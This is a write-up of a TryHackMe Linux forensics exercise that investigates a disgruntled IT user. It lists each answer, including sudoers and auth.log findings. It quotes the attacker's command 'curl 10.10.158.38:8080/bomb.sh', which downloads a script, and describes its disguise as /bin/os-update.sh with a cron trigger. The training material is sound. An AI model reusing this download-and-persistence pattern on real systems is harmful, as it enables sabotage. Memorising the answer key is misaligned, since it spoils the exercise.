Page cover

Disgruntled TryHackMe

Use your Linux forensics knowledge to investigate an incident.

Task 3 Nothing suspicious... So far

Here’s the machine our disgruntled IT user last worked on. Check if there’s anything our client needs to be worried about.

My advice: Look at the privileged commands that were run. That should get you started.

Q1) The user installed a package on the machine using elevated privileges. According to the logs, what is the full COMMAND?

Check the sudo execution history.

We can investigate the bash_history file under the /home directory

cat /home/cybert/.bash_history

sudo apt install dokuwiki

Ans : /usr/bin/apt install dokuwiki

Q2) What was the present working directory (PWD) when the previous command was run?

by looking in the /home

Ans : /home/cybert

Task 4 Let’s see if you did anything bad

Keep going. Our disgruntled IT was supposed to only install a service on this computer, so look for commands that are unrelated to that.

Q3) Which user was created after the package from the previous task was installed?

By looking in the Second photos we found sudo adduser it-admin

Ans : it-admin

Q4) A user was then later given sudo priveleges. When was the sudoers file updated? (Format: Month Day HH:MM:SS)

let's investigate log files 

vim /var/log/auth.log

I found IT

Ans : Dec 28 06:27:34

Q5) A script file was opened using the "vi" text editor. What is the name of this file?

remember the created acount , let's investigate bash history in it

Ans : bomb.sh

Task 5 Bomb has been planted. But when and where?

That bomb.sh file is a huge red flag! While a file is already incriminating in itself, we still need to find out where it came from and what it contains. The problem is that the file does not exist anymore.

Q6) What is the command used that created the file bomb.sh?

From the prev screen

Ans : curl 10.10.158.38:8080/bomb.sh --output bomb.sh

Q7 The file was renamed and moved to a different directory. What is the full path of this file now?

The vi text editor can edit and save files to a different location

let's investigate viminfo

Ans : /bin/os-update.sh

Q8 ) When was the file from the previous question last modified? (Format: Month Day HH:MM)

easy :)

Ans : Dec 28 06:29

Q9) What is the name of the file that will get created when the file from the first question executes?

the file is goodbye.txt

Ans : goodbye.txt

Task 6 Following the fuse

So we have a file and a motive. The question we now have is: how will this file be executed?

Q10 ) At what time will the malicious file trigger? (Format: HH:MM AM/PM)

by going to https://crontab.guru/

Ans : 08:00 Am

I think the challange it's not easy , its very easy 😄 <3

PreviousUnattended TryHackMeNextRDP Cache Forensics